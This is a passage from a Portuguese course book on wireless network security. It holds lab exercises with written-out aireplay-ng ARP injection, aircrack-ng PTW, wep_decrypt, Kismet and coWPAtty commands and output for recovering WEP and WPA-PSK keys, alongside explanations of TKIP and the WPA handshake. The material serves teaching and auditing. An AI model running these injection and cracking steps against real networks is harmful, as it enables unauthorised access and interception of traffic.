# aireplay-ng -3 rausb0 -b <BSSID> -h <MAC Cliente>

Com esse comando, vamos capturar o tráfego ARP entre um cliente (especificado pelo parâ-
metro “h”) e o AP (especificado pelo parâmetro “b”) e o injetar novamente, criando tráfego
ideal mais rapidamente. Devido ao comportamento do tráfego ARP, é necessário que pelo
menos um cliente esteja associado ao AP para que o funcionamento da ferramenta seja
bem-sucedido.

O método PTK usa especificamente tráfego ARP, por isso esse tipo de injeção foi escolhido.
Consulte a documentação do Aireplay-ng para conhecer os outros tipos de injeção.

Essa é a saída do comando aireplay-ng. Note que à esquerda (got...) é exibido o número de
pacotes ARP capturados. À direita é exibido o número de pacotes injetados.

The interface MAC (00:1E:E5:27:C2:8A) doesn’t match the specified


MAC (-h).

ifconfig rausb0 hw ether 00:15:AF:B6:46:45

21:50:29 Waiting for beacon frame (BSSID: 00:0F:66:81:7C:88) on


channel 6

Saving ARP requests in replay_arp-0908-215029.cap


Segurança em Redes sem Fio

You should also start airodump-ng to capture replies.

Read 1508 packets (got 136 ARP requests and 0 ACKs), sent 149
packets...(501 pps

Read 1555 packets (got 176 ARP requests and 0 ACKs), sent 199
packets...(500 pps

Read 1607 packets (got 222 ARP requests and 0 ACKs), sent 248

120
packets...(498 pps

Read 1655 packets (got 260 ARP requests and 0 ACKs), sent 298
packets...(498 pps

Read 1704 packets (got 302 ARP requests and 0 ACKs), sent 349
packets...(500 pps

Aguarde até que o número de pacotes injetados atinja a marca de 40 mil pacotes. Observe a saída
“sent xxx packets”. Quando o número 40 mil for alcançado, avance para a atividade seguinte.

É bem provável que a quantidade de pacotes necessários não tenha sido obtida com a
injeção de apenas 40 mil pacotes. Por isso, vamos manter a janela com o Aireplay-ng aberta
e manter a execução de Aircrack-ng, que realiza as colisões em intervalos de 5 mil pacotes.

Atividade 6.2 – Recuperando uma chave WEP utilizando o Aircrack-ng


Nesta atividade, vamos utilizar a ferramenta Aircrack-ng no Linux para recuperar a chave WEP
do tráfego pré-capturado.

Para utilizar o Aircrack-ng, é necessária uma captura com no mínimo 250 mil pacotes (IVs)
para chaves WEP de 40 bits e pelo menos 500 mil pacotes (IVs) para chaves de 104 bits.

O ataque PTW, introduzido em 2007, diminuiu significativamente o tempo necessário para


um ataque bem-sucedido. Usando técnicas ativas, ou seja, enviando tráfego deauth ou ARP
re-injection (capturar tráfego ARP e repeti-lo), esse novo ataque apenas enfatiza que a des-
coberta da chave WEP é uma questão de hardware, software, drivers e tempo.

Verifique o arquivo pré-capturado do instrutor, /root/Desktop/SEG6/ wep-aireplay-ng.cap com


o Wireshark e veja quantos pacotes foram necessários para a recuperação da chave WEP
nesse caso específico.

Abra uma nova janela de terminal, a terceira janela. Mantenha as duas outras janelas
abertas, com Airodump-ng e Aireplay-ng.

Execute o comando aircrack-ng. Verifique os parâmetros disponíveis executando a própria


ferramenta aircrack-ng:

# aircrack-ng

Aircrack-ng 1.0 rc1 r1085 - (C) 2006,2007,2008 Thomas d’Otreppe

Original work: Christophe Devine

http://www.aircrack-ng.org

usage: aircrack-ng [options] <.cap / .ivs file(s)>


Capítulo 6 - Roteiro de Atividades

Common options:

-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)

-e <essid> : target selection: network identifier

-b <bssid> : target selection: access point’s MAC

-q : enable quiet mode (no status output)

-C <macs> : merge the given APs to a virtual one

121
Static WEP cracking options:

-c : search alpha-numeric characters only

-t : search binary coded decimal chr only

-h : search the numeric key for Fritz!BOX

-d <mask> : use masking of the key (A1:XX:CF:YY)

-m <maddr> : MAC address to filter usable packets

-n <nbits> : WEP key length : 64/128/152/256/512

-i <index> : WEP key index (1 to 4), default: any

-f <fudge> : bruteforce fudge factor, default: 2

-k <korek> : disable one attack method (1 to 17)

-x or -x0 : disable bruteforce for last keybytes

-x1 : last keybyte bruteforcing (default)

-x2 : enable last 2 keybytes bruteforcing

-y : experimental single bruteforce mode

-K : use only old KoreK attacks (pre-PTW)

-s : show the key in ASCII while cracking

-M <num> : specify maximum number of IVs to use

-D : WEP decloak, skips broken keystreams

-P <num> : PTW debug: 1: disable Klein, 2: PTW

-1 : run only 1 try to crack key with PTW

WEP and WPA-PSK cracking options:

-w <words> : give filename(s) of the dictionaries

-r <DB> : path to airolib-ng database

(Cannot be used with -w)

--help : Displays this usage screen

Exemplo de comando usando o novo ataque PTW:5

# aircrack-ng -P 2 /root/Desktop/SEG6/saidas/wep/airodump-saida-01.
cap
Segurança em Redes sem Fio

A captura e injeção de pacotes estão sujeitas a diversas variáveis. Por isso, é possível que
você não consiga capturar o tráfego mínimo necessário. Se isso acontecer, use o arquivo
pré-capturado para observar a saída bem-sucedida do comando dentro do tempo destinado
ao laboratório.

# aircrack-ng -P 2 /root/Desktop/SEG6/wep-aireplay-ng.cap

122
Verifique a quantidade de vetores de inicialização (IVs) necessários e o tamanho da chave obtida,
e estime o tempo gasto na recuperação da chave depois que o tráfego ideal foi capturado.

Agora vamos repetir o comando anterior com outros métodos de ataque para constatar o
avanço que o ataque PTW trouxe.

Atividade 6.3 – Decifrando tráfego WEP


Nesta atividade, utilizaremos a ferramenta wep_decrypt para remover a proteção WEP
do tráfego capturado. O resultado desse comando é um arquivo com o tráfego capturado
aberto, ou seja, quadros 802.11 do tipo “data” (dados) desprotegidos de WEP, como se o
tráfego capturado fosse de uma rede aberta.

Primeiro vamos capturar mais tráfego da rede da qual já descobrimos a chave no exercício
anterior. Use Airodump-ng especificando canal e SSID para capturar somente o tráfego que
lhe interessa, ou seja, não capture o tráfego de outros Access Points.

Verifique as opções do wep_decrypt:

# wep_decrypt

Execute o wep_decrypt usando os seguintes parâmetros. Vamos usar o arquivo que captu-
ramos e a chave WEP que já obtivemos.

# wep_decrypt –k chave /root/Desktop/SEG6/saidas/wep/trafego-wep.


cap /root/Desktop/SEG6/saidas/wep/trafego-wep-aberto.cap

Lembre-se de que a chave tem 10 caracteres hexadecimais (0-9 a-f) se o AP foi configurado
com WEP 40 bits. Se o AP foi configurado com WEP 104 bits, então o comprimento da chave
é de 26 caracteres hexadecimais.

Verifique o conteúdo decifrado (trafego-wep-aberto.cap) do tráfego, utilizando Wireshark.


Observe que os quadros 802.11 do tipo “data” (dados) agora exibem o conteúdo em claro, ou
seja, o conteúdo TCP/IP.

Outra maneira de decodificar o tráfego WEP é com Kismet. Podemos fazer isso de duas formas:

11 Em tempo real;

11 Sobre um arquivo Pcap pré-capturado.

Inicie o Kismet através do menu “BackTrack > Information Gathering > Network Analysis >
WLAN Analysis > kismet”. Não precisamos configurar as fontes de captura no arquivo
/usr/local/etc/kismet.conf, porque isso é feito de maneira automática. Entretanto, para con-
figurar o Kismet manualmente é necessário editar os arquivos kismet.conf e kismet_ui.conf
(caso queira alterar a aparência da interface gráfica) e executar o próprio comando kismet
(e não start-kismet-ng).
Capítulo 6 - Roteiro de Atividades

Em “/usr/local/etc/kismet.conf”, procure pelo trecho com a configuração de fontes de


captura. Em seguida, configure a fonte de captura adequada para a interface do laboratório,
que usa o módulo rt73.

ncsource=wlan0

A seguir, configure a decriptação automática do tráfego WEP, incluindo a seguinte linha:

wepkey=00:01:02:03:04:05,111111111111111111111111111

123
Onde:

11 00:01:02:03:04:05:06 é o BSSID do AP;

11 A cadeia de caracteres seguinte, separada por vírgula, é a chave da rede (10 caracteres
hexadecimais para WEP 40 bits e 26 caracteres hexadecimais para WEP 104 bits).

Ao iniciar o Kismet (comando kismet e não start-kismet-ng), o tráfego do AP especificado


será capturado e terá a proteção de WEP removida em tempo real. Pode confirmar com o
comando “d” de Kismet, que imprime em tempo real todo texto em claro (ASCII) contido no
arquivo de captura.

O Kismet também pode ser usado para decriptar tráfego WEP pré-capturado, seja com
Kismet, TCPdump ou Airodump-ng (pacote Aircrack-ng), ou seja, arquivos no formato
tcpdump/libpcap. Para isso substitua o “capture source” da interface de rede 802.11 USB
pela seguinte fonte de captura:

pcapfile

Leia a seção 12 da documentação de Kismet (Capture Sources) para conhecer os parâmetros


desta fonte de captura.

Depois de configurado, basta iniciar o Kismet. Todo o tráfego do arquivo de formato libpcap
será rapidamente processado por Kismet.
Segurança em Redes sem Fio

124
7
Redes WPA-PSK
objetivos

Apresentar conceitos de redes WPA que usam chave compartilhada; mostrar


mecanismos de autenticação e geração de chaves; ensinar a auditar uma rede WPA-PSK;
apresentar o TKIP, mecanismo de segurança criado para resolver os problemas de WEP.

conceitos
WPA, TKIP e redes WPA-PSK.

Introdução
WPA: q
11 Wi-Fi Protected Access (abril de 2003).

11 Trabalho conjunto entre Wi-Fi Alliance e IEEE.

11 Baseado no draft de 802.11i (pré-padrão).

11 Resolveu todos os problemas de WEP.

11 Projetado para causar pouco impacto no desempenho da rede e ser implementável


por upgrade de software.

11 TKIP para cifragem dos dados.

WPA é a primeira implementação do padrão IEEE 802.11i e conta com a maioria de suas
especificações. É baseada em Temporal Key Integrity Protocol (TKIP) para confidencialidade
e integridade dos dados.

Assim como WPA2 e Wi-Fi, WPA não é um padrão propriamente dito. É uma certificação que
a Wi-Fi Alliance concede a produtos, com base em primeiro lugar em interoperabilidade
entre fabricantes. O padrão IEEE em questão é o 802.11i, implementado por completo em
WPA2, e parcialmente (baseado no draft) em WPA (pré-padrão). O protocolo TKIP foi criado
considerando duas limitações:
Capítulo 7 - Redes WPA-PSK

11 Implementável por meio de upgrade de software, de forma que não seja necessário
upgrade de hardware. Essa condição limitou a escolha de mecanismos de segurança;

11 Limitação de processamento dos dispositivos, uma vez que dispositivos de rede como
interfaces de rede e Access Points não possuem poder de processamento significativo.

125
WPA
Personal: q
11 Não requer servidor de autenticação.

11 Pre-Shared Key (PSK).

11 Ambientes domésticos e pequenos escritórios (SOHO).

Enterprise:

11 Centraliza autenticação com um servidor de autenticação central.

11 802.1x com gerência de chaves por métodos EAP.

22 EAP-TLS, EAP-TTLS/MSCHAPv2, PEAPv0/PEAP-MSCHAPv2, PEAPv1/EAP-GTC e EAP-SIM.

O WPA pode ser implantado de dois modos diferentes, de acordo com o porte e as necessi-
dades da empresa:

11 Personal: voltado para o mercado doméstico e de pequenas empresas (SOHO), imple-


menta autenticação por chave pré-compartilhada (PSK), ou seja, a distribuição das chaves
é feita manualmente entre as estações;

11 Enterprise: voltado para implantações maiores, esse modo implementa autenticação


802.1x com um dos tipos de EAP disponíveis.

11 Projetado para substituir WEP sem a necessidade de substituir hardware. q


11 Baseado em RC4, como WEP.

11 Resolve os problemas de WEP.

22 IV de 48 bits e regras de sequenciamento.

22 MIC Michael.

33 Message Integrity Code.

22 Derivação e distribuição de chaves.

22 Chave por pacote com TKIP.

33 Temporal Key Integrity Protocol.

O desenvolvimento de WPA foi pautado com uma importante condição: ser implantado em
hardware existente. Essa condição influenciou diversos de seus componentes na limitação
de processamento ou com a necessidade de ser atualizável por software. WPA resolveu as
vulnerabilidades de WEP de três formas diferentes:

11 IV de 48 bits e regras para a sequência: aumenta o espaço do IV de 24 para 48 bits, isto


é, mais de 500 trilhões de possibilidades. Outra medida que afeta os IVs é a existência de
regras que definem como os IVs serão selecionados e verificados;

11 Michael: WEP não implementava Message Integrity Check (MIC) em seu protocolo, essen-
cial na prevenção de ataques de replay. WPA adota um MIC chamado Michael, que foi
Segurança em Redes sem Fio

projetado levando em consideração os mesmos limites de hardware de WEP;

11 TKIP: mecanismo que gera chaves únicas por pacote.

TKIP – MIC
11 Temporal Key Integrity Protocol. q
11 Conjunto de mecanismos de segurança.

126
11 Melhora segurança em relação a WEP, mesmo com limitações de projeto. q
22 MIC: proteção contra tráfego forjado.

22 Sequenciamento do IV: proteção contra ataques de replay.

22 Rekeying: contra-ataques que abusam da reutilização de chaves.

22 Key Mixing: proteção da chave em si.

TKIP é o protocolo que provê a confidencialidade e a integridade ao tráfego da rede que WEP
não proporcionava. Juntamente com a possibilidade de autenticação 802.1x/EAP no modelo
Enterprise, TKIP melhora a proteção da rede por diversos mecanismos:

11 Hierarquia e gerenciamento de chaves que eliminam a previsibilidade de WEP;

11 Proteção contra forjamento de pacotes com MIC (Message Integrity Check);

11 Aumenta o tamanho da chave de 40 para 128 bits;

11 Substitui a chave estática de WEP.

A seguir, veremos cada uma destas melhorias em mais detalhes.

WEP
CRC32: q
11 Permite duas entradas com o mesmo checksum.

Sem MIC:

11 Atacante pode capturar, alterar e injetar tráfego com mesmo checksum.

11 Explorado em ataques de replay.

Uma das vulnerabilidades de WEP é permitir que seu tráfego seja capturado, alterado e
retransmitido. Isso é possível porque a função de hash CRC32 (Cyclic Redundancy Check) –
usada tanto no checksum ICV quanto no FCS de WEP – possibilita que o conteúdo do pacote
seja alterado, obtendo um mesmo checksum CRC32. Em WPA, este problema foi resolvido
com a introdução de Michael como MIC.

Michael
11 Gera hash de 64 bits. q
11 A partir de cabeçalho + payload e chave de 64 bits.

11 Transmissor envia hash com pacote cifrado.

11 Receptor verifica hash no recebimento.

O protocolo usado para MIC em TKIP se chama Michael, criado por Niels Fergunson.

Essa função de autenticação recebe, como entradas, dados arbitrários (cabeçalho e payload,
no caso de 802.11) e uma chave de 64 bits para gerar um hash de 64 bits, incluído no pacote.
Recebido o pacote, o sistema receptor aplica Michael novamente para gerar o hash, com
Capítulo 7 - Redes WPA-PSK

a mesma chave usada pelo sistema que transmitiu. Se um atacante alterar o pacote em
trânsito, essa alteração se refletirá no hash, que será diferente do esperado pelo sistema
receptor, porque o atacante não possui a chave MIC de 64 bits.

127
TKIP – sequência do IV
Ataques de replay. q
11 WEP não impõe restrições sobre a seleção de IVs.

22 Não há proteção contra replay.

Atacante pode capturar e retransmitir pacotes.

11 Não é necessário conhecer o conteúdo dos pacotes.

11 Usado para repetir uma dada transação na rede.

Outro problema de WEP é a ausência de um mecanismo de restrição à sequência de valores


de IV selecionados. O IV não é usado como indicador da sequência com que os pacotes tra-
fegam na rede, servindo apenas para cifrar e decifrar tráfego em conjunto com a chave WEP.
Essa característica permite que um atacante injete, na rede em questão, tráfego capturado
previamente – evento que o sistema receptor não tem condições de detectar.

Um fator que certamente facilita esse tipo de ataque é que não é necessário conhecer o con-
teúdo do tráfego capturado para retransmiti-lo, ou seja, não é necessário ter a chave WEP.

Para pensar

Um atacante poderia utilizar essa técnica para provocar um tráfego que lhe inte-
resse na rede; por exemplo: a resposta de um sistema financeiro que ele sabe, de
antemão, que opera em rede sem fio.

Ataques de replay: como TKIP resolveu o problema


11 Requer IVs sequenciais, controlados por estações e APs. q
11 IV transmitido em claro.

11 IVs menores que os anteriores são descartados.

11 IVs maiores que o esperado passam por outros processos de validação.

TKIP resolve o problema de WEP de uma maneira simples: exige que todas as estações e
Access Points da rede usem IVs sequenciais, que começam em 0 (zero) e são incrementados
de 1 (um). As estações devem manter controle sob o número de sequência de cada uma das
outras estações. No caso de receberem um pacote com IV menor que um anteriormente
recebido, o pacote é simplesmente descartado. Por outro lado, se o IV tem valor maior que
o esperado, então o pacote passa por verificação de MIC e de chave de cifragem antes que o
contador da estação seja atualizado com o novo valor.

O IV é transmitido no primeiro e terceiro bytes do pacote, possibilitando IVs de 16 bits (65.535).


É interessante observar que, diferente de WEP, os IVs nunca são repetidos: o número de
Segurança em Redes sem Fio

sequência é reiniciado antes de voltar a 0 (zero) e as chaves passam por rotação permanente.

Rekeying
11 Problema de WEP, que eventualmente reutilizava chaves. q
11 Colisões de IV.

11 Ataque possível com texto em claro conhecido.

128
A repetição de chaves invalida o protocolo RC4. Em redes WEP esse evento acontece, uma
vez que há apenas 16 milhões de valores IV únicos.

Uma solução para esse problema seria a troca periódica e automática da chave WEP, o que
é possível somente com extensões disponíveis em 802.1x. Entretanto, a rotação baseada em
tempo, usada em Dynamic WEP, é ineficiente a taxas altas de transferência. Assim, a rotação
deveria ter, como gatilho, o número de pacotes enviados e recebidos, e não o tempo de
duração desta operação.

Rekeying – a solução de WPA


Três níveis de chave e rotação regular. q
Tipos:

11 Master Key.

11 Intermediate Key.

11 Temporal Key.

Distribuição por mensagens EAPOL-Key (EAP Over LAN).

TKIP resolveu o problema de reemissão de chaves de WEP com a implantação de três tipos
de chave aliada à rotação regular. Os níveis das chaves são os seguintes:

11 Master Key: chave-mestra usada para proteger a chave intermediária. É a chave de


maior nível, derivada de uma transação 802.1x ou de uma chave pré-compartilhada, no
caso de WPA-PSK;

11 Intermediate Key: misturando informações únicas de cada par de conexão (origem e


destino), para evitar ataques por parte de quem conhece a chave PSK, sua função prin-
cipal é proteger as chaves temporárias;

11 Temporal Key: nível mais baixo da chave usada para cifrar os dados. Sofre rotação antes
que os valores se repitam.

A rotação de chaves temporárias é realizada por mensagens do tipo EAPOL-Key.

Key Mixing
11 Problema de WEP. q
11 Ocorrência de IVs fracos revela a chave WEP.

11 Ataques FMS (Fluhrer, Mantin e Shamir).

11 Divulgação do IV reduz eficácia da chave.

11 Colisão de chaves.

11 Solução deveria se limitar aos mesmos 3 bytes reservados para IV.

A divulgação do IV pelo protocolo WEP é outro ponto de vulnerabilidade, pois permite que
um atacante identifique colisões simplesmente ao capturar tráfego na rede em questão.
Capítulo 7 - Redes WPA-PSK

WPA mitiga esse problema ao levar em conta as limitações de projeto, isto é, deveria usar
os mesmos 3 bytes reservados para IV em WEP, para que fosse possível a atualização por
software. Para WPA, foi desenvolvido o mecanismo de mistura de chaves (key mixing).

129
Key Mixing – solução de WPA
Chave temporária para cifrar dados, em vez de PSK. q
Fases:

11 1: mistura endereços MAC e chave para produzir “chave intermediária


(PTK)” – PSK > PMK > PTK.

11 2: cifra o número de sequência com a chave intermediária ou temporária.

11 Resultado: chave de 128 bits.

A função do campo IV WEP comporta os três primeiros bytes da chave resultante.

Em vez de cifrar os dados com a chave pré-compartilhada (como em WEP), WPA cifra os
dados com uma chave temporária. Esse processo é composto de duas fases:

11 Na fase 1: uma PMK (Pairwise Master Key) é criada a partir da PSK e depois misturada
com os endereços MAC de origem e destino, gerando uma chave intermediária chamada
Pairwise Transient Key PTK ();

11 Na fase 2: o número de sequência do pacote é cifrado com a chave temporária, resul-


tando em uma chave de 128 bits que será usada na transação.

A chave de 128 bits é usada para cifrar o pacote, sendo que os primeiros 3 bytes são
transmitidos no campo que comporta IV em WEP. Os endereços MAC são misturados com
a chave temporária, o que torna a chave única, mesmo se todos os clientes usam a mesma
PSK e PMK. Mesmo que um atacante tivesse acesso a esta chave de 128 bits resultante do
processo, ele não seria capaz de determinar estas duas últimas chaves.
Figura 7.1
Detalhes de
TKIP – 4-Way Handshake informação
da chave.
Segurança em Redes sem Fio

130
O handshake de TKIP é a maneira pela qual Supplicant e Authenticator trocam os dados
necessários para gerar a Pairwise Temporal Key (PTK). Para que PTK seja gerado, assume-se
que AP e estação tenham conhecimento de:

11 Paiwise Master Key (PMK), resultado da chave pré-compartilhada em WPA-PSK ou resul-


tado de uma transação do protocolo 802.1x para WPA-Enterprise;

11 Seus próprios endereços MAC, uma vez que PTK é gerado a partir da concatenação de
PMK, ANonce, SNonce, MAC do AP e MAC da estação.

No primeiro quadro, temos uma seção “Key Information”, que fornece informações sobre
tipos de chaves que serão trocadas: “HMAC-MD5” para MIC, e RC4 para “cifragem”.

Figura 7.2 Nessa nova visão do primeiro quadro, é possível visualizar o ANonce, indicador de uma nova
Valores das chaves. negociação PTK.

Em segurança, “nonce” é um “number used once”, um número aleatório ou pseudoaleatório


usado apenas uma vez, cujo objetivo é evitar que uma comunicação antiga seja reutilizada
em ataques do tipo replay.

Esse quadro contém o primeiro de dois nonces usados no cálculo de PTK, o ANonce (A de AP).
Em posse desse valor, a estação (STA) tem a capacidade de construir a Pairwise Transient Key
Capítulo 7 - Redes WPA-PSK

(PTK). A estação precisa desse dado para construir o PTK.

O quadro em particular não carrega MIC porque o Authenticator ainda não possui informações
suficientes para gerar o PTK, não tendo, portanto, um valor de MIC necessário para o cálculo.

O segundo quadro tem origem no Supplicant, e contém o nonce do Supplicant e o MIC do


quadro. Antes de transmitir esse quadro, o Supplicant tem conhecimento das informações
de nonce do Supplicant e pode calcular o PTK. Com o PTK calculado, a chave MIC HMAC-MD5
é conhecida e será usada no algoritmo HMAC-MD5 para gerar um MIC de 128 bits.

131
Quando o Authenticator recebe esse segundo quadro, extrai o nonce do Supplicant e pode
calcular o PTK usando a chave HMAC para validar o MIC do pacote.

O penúltimo quadro do handshake se origina do Authenticator, que inclui o Group Temporal Figura 7.3
Key (GTK) e um número de sequência juntamente com um MIC. O número de sequência é Handshake.
Supplicant confirma
usado no próximo quadro multicast ou broadcast, de forma básica de detecção de replay nonces únicos e
pelas estações. PTK corretos.

Esse quadro garante para o Supplicant que não há nenhum atacante “homem do meio” (Man
In The Middle – MITM), ou seja, que o quadro não foi alterado no caminho. Essa verificação
garante também que o Authenticator calculou o PTK corretamente.
Segurança em Redes sem Fio

132
Figura 7.4 O último quadro do handshake vem do Supplicant, que reconhece o recebimento do quadro
Pronto para anterior. Esse quadro também serve para indicar que o Supplicant está pronto para
transmitir e receber
dados. transmitir e receber dados.

STA AP

ANonce

STA constrói o PTK


SNonce + MIC

AP constrói o PTK

GTK + MIC

Figura 7.5 Ack


As quatro etapas
do handshake TKIP.
Capítulo 7 - Redes WPA-PSK

O gráfico ilustra as quatro etapas do handshake TKIP, descritas passo a passo anteriormente.
O objetivo dessa transação é fornecer ao cliente a Pairwise Transient Key (PTK), a chave tem-
porária que valerá até a próxima emissão de chaves, usada na geração de três novas chaves:

11 EAPOL-Key Confirmation Key (KCK): chave usada para computar o MIC em pacotes
EAPOL-Key;

11 EAPOL-Key Encryption Key (KEK): chave usada para cifrar os pacotes EAPOL-Key;

11 Temporal Key (TK): chave usada para cifrar o tráfego sem fio em si.

133
Outro objetivo desta transação é fornecer para a estação o número de sequência usado na
transmissão de tráfego broadcast e multicast.

Identificando redes WPA-PSK


Quadros beacon: q
11 Divulgam características do AP.

11 Identificam WPA-PSK.

11 Suporte a TKIP –

11 WPA.

11 Auth Key Management –

11 PSK.

Antes de auditar a rede, é importante confirmar se ela realmente é baseada no protocolo


TKIP com autenticação por chaves pré-compartilhadas (WPA-PSK). Quadros beacon são
transmitidos com uma frequência muito alta (10 vezes por segundo) e auxiliam na identifi-
cação dessas redes.
Figura 7.6
Quadro beacon de
Filtro de Wireshark uma rede WPA-PSK
Segurança em Redes sem Fio

O quadro beacon possui um tag de gerenciamento que indica os mecanismos de cifragem


e o gerenciamento de chaves de autenticação suportadas pelo AP. Podemos usar a fer-
ramenta Wireshark para identificar quadros que contenham esse tag de gerenciamento
definindo TKIP ou AES como cifrador e esquema de gerenciamento de autenticação como
PSK ou 802.1x. O slide mostra o quadro beacon de uma rede WPA-PSK, selecionado com o
seguinte filtro:

134
wlan_mgt.tag.number eq 221

Esse tag tem 22 bytes e é interpretado pelo Wireshark diversas vezes, o que nos traz infor-
mações interessantes:

11 TKIP é o cifrador tanto para unicast quanto para multicast;

11 PSK é o tipo de gerenciamento de autenticação por chaves.

Ataques contra WPA-PSK


11 Falha na derivação de PTK. q
11 Ataque off-line de dicionário.

11 Requisito: capturar handshake.

Implementação do ataque: coWPAtty.

11 Versões mais recentes com ataque pré-computado.

22 Ataques muito mais rápidos.

22 Pré-computado com dicionário e SSID.

w
Com seu artigo publicado em 2003, Robert Moskowitz apontou para uma fraqueza no
processo de derivação da Pairwise Transient Key (PTK) de redes WPA-PSK. Essa vulnera-
Leia o texto “Weakness bilidade permite que um atacante realize um ataque de dicionário off-line contra a chave
in Passphrase Choice in pré-compartilhada (PSK), coletando apenas o conteúdo do handshaking.
WPA Interface”, de
Robert Moskowitz, e
Joshua Wright, do SANS Institute, implementou esse ataque na ferramenta coWPAtty, que
visite o site coWPAtty:
https://sourceforge. será abordada em mais detalhes na atividade prática deste Capítulo.
net/projects/cowpatty
Melhorando a segurança de WPA-PSK
11 Insegurança está em senhas compartilhadas. q
11 Limitar conhecimento da chave.

11 Difícil de gerenciar em ambiente corporativo.

11 Seleção de senha forte.

11 Combinação variada de mais de 20 caracteres.

11 Solução: WPA com 802.1x/EAP.

11 Elimina o compartilhamento da chave PSK.

Devemos ter em mente que WPA-PSK é voltado para o mercado doméstico e de pequenas
empresas (SOHO), uma vez que o gerenciamento das chaves se torna impraticável em
ambiente corporativo. Considerando esse escopo de WPA-PSK, duas medidas podem ser
tomadas para melhorar a sua segurança:

11 Limitar o conhecimento da senha, algo subjetivo demais para ser considerado como
medida de segurança;
Capítulo 7 - Redes WPA-PSK

11 Seleção de senhas fortes, com caracteres variados e com pelo menos 20 caracteres
de extensão.

Essas são as duas medidas de segurança possíveis, desconsiderando segurança em profun-


didade – implantação de VPN, firewall e outras medidas de apoio à segurança da rede no
nível da camada 2. A única maneira de se elevar o mecanismo de segurança da rede sem fio
em si é migrar para o modelo WPA-Enterprise, ou seja, implantar autenticação 802.1x com
um dos métodos Extensible Authentication Protocol (EAP).

135
Vulnerabilidades do TKIP
Apesar das implementações de segurança, o protocolo TKIP é vulnerável. q
11 Utiliza um mecanismo de verificação de integridade basedado no CRC32.

11 Ataque Beck-Tews (QoS).

11 Ataque Origashi-Morii (MITM).

Apesar do protocolo TKIP implementar uma solução contra replay de pacotes, essa não foi sufi- l
ciente, uma vez que ainda utiliza um mecanismo de verificação de integridade baseado em CRC32. No artigo “Practical
attacks against WEP
A realização desse ataque não é simples, pois depende de um access point com suporte a QoS, and WPA”, Martin Beck
e Erick Tews demons-
pois o ataque utiliza os canais QoS para transmitir os pacotes “reconstruídos”. Esse ataque
tram esse ataque, que
pode ser realizado com a ferramenta tkiptun-ng, disponibilizada pelo Aircrack-ng, porém não ficou conhecido como
realizaremos esse ataque devido à falta de suporte de QoS pelo AP que utilizamos nos testes. ataque Beck-Tews. Leia
também o artigo “
Em 2009, dois pesquisadores japoneses, Toshihiro Ohigashi and Masakatu Morii, apre- A Practical Message
Falsification Attack on
sentaram um paper com uma forma mais eficiente de executar o ataque de Beck-Tews,
WPA” de Toshihiro
utilizando uma técnica de Man In The Middle. Porém, esse ataque não foi implementado Ohigashi e Masakatu
oficialmente na ferramenta tkiptun-ng. Morii.

WPA2
WPA2 é a implementação de fato do modelo de segurança proposto em 802.11i. q
11 Implementa 802.11i por completo.

11 TKIP > CCMP.

11 RC4 > AES.

11 Também nas versões Personal e Enterprise.

A implementação completa de 802.11i é oferecida por WPA2 e apresenta as seguintes carac-


terísticas:

11 WPA2 Personal e Enterprise: assim como WPA, é possível usar chave pré-compartilhada
(PSK) ou autenticação 802.1 com um dos tipos de EAP disponíveis.

11 Robust Security Network (RSN) para associações.

11 Counter Mode with Cipher Block Chaining Message Authentication Code Protocol
(CCMP) para prover confidencialidade, integridade e autenticação. Baseado no algoritmo
Advanced Encryption Standard (AES).

11 A implementação desse protocolo foi feita completamente do zero, baseado nos estudos
dos protocolos 802.10 e IPsec, não tendo nenhuma relação com WEP e necessitando
suporte específico tanto de hardware quanto de software no AP e na interface de acesso.

11 A implementação de WPA2, bem como WPA associado a 802.1x e EAP, será abordada nos
Segurança em Redes sem Fio

Capítulos 9 e 10. Neste Capítulo, implantaremos uma WLAN mais segura, baseada em
WPA2 (AES/CCMP) e com autenticação 802.1x pelo EAP type EAP-TLS.

136
Roteiro de Atividades 7
Atividade 7.1 – Descobrindo a chave WPA-PSK por ataque de dicionário
Neste exercício, constataremos que os protocolos WPA Personal (WPA-PSK) e WPA2 Personal
(WPA2-PSK) – mecanismos de segurança que muitos usuários consideram invulneráveis –
são suscetíveis a ataques de dicionário.

Usaremos a ferramenta coWPAtty, desenvolvida por Joshua Wright (SANS Institute/Aruba


Networks) para aplicar esse ataque. Os arquivos de demonstração estão no seguinte diretório:

11 /root/Desktop/SEG6/wpa/exemplo-john-rules.txt : exemplo de derivações de uma


palavra (“exemplo”) depois de processadas pelo utilitário John the Ripper com o parâ-
metro “--rules”

11 wordlist-portugues-john-rules.txt: palavras de dicionário parcial depois de proces-


sadas pelo utilitário John the Ripper com o parâmetro “--rules”;

11 wordlist-portugues-john-rules.hash: arquivo de hash coWPAtty (genpmk) para o SSID


“rnpesr”, usando o arquivo wordlist-portugues-john-rules.txt como fonte;

11 wordlist-portugues.hash: arquivo de hash coWPAtty (genpmk) para o SSID “rnpesr”,


usando o arquivo wordlist-portugues.txt como fonte;

11 wpa-eapol-rnpesr.cap: arquivo em formato tcpdump/libpcap com tráfego EAPOL (EAP


over LAN) de uma associação entre um cliente e um AP em uma rede configurada com
WPA Personal (TKIP) e SSID “rnpesr”. Para usar a ferramenta coWPAtty, o aluno precisa de
um arquivo com no mínimo um handshake TKIP, como esse.

Todos esses arquivos (exceto exemplo-john-rules.txt) serão criados pelo aluno na segunda
fase do laboratório, em ambiente ao vivo. Considere-os como modelos.

1. Abra o arquivo pré-capturado “wpa-eapol-rnpesr.cap” usando a ferramenta Wireshark.


Verifique a existência do tráfego four-way-handshake da autenticação ou associação do
cliente e o tipo de chave usada (WPA). A captura desse tráfego é essencial na utilização
do coWPAtty.

Veja as opções deste comando:

# cowpatty

Atenção aos parâmetros “-f”, “-s” e “-r”. Mais adiante utilizaremos também o parâmetro “-d”
para lidar com hashs de senha pré-processados para um determinado SSID, usando o
comando genpmk (pacote coWPAtty).
Capítulo 7 - Roteiro de Atividades

Para iniciar o ataque off-line de força bruta contra o arquivo de captura wpa-eapol-rnpesr.cap,
use o comando:

# cowpatty –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s
rnpesr –r /rnp-esr/7-wpa/demo/wpa-eapol-rnpesr.cap

Aguarde.

Anote o tempo gasto no processo: .

137
Se ao final da execução do comando tivermos a seguinte saída, nenhuma das palavras é a
chave PSK (Pre-Shared Key) da rede “rnpesr”.

Unable do identify the PSK from the dictionary file. Try expanding
your passphrase list, and double check the SSID. Sorry it didn’t
work out.

1158 passphrases tested in 28.53 seconds: 40.59 passphrases/second

Siga a orientação da própria saída do programa, ou seja, expanda a sua lista de palavras.
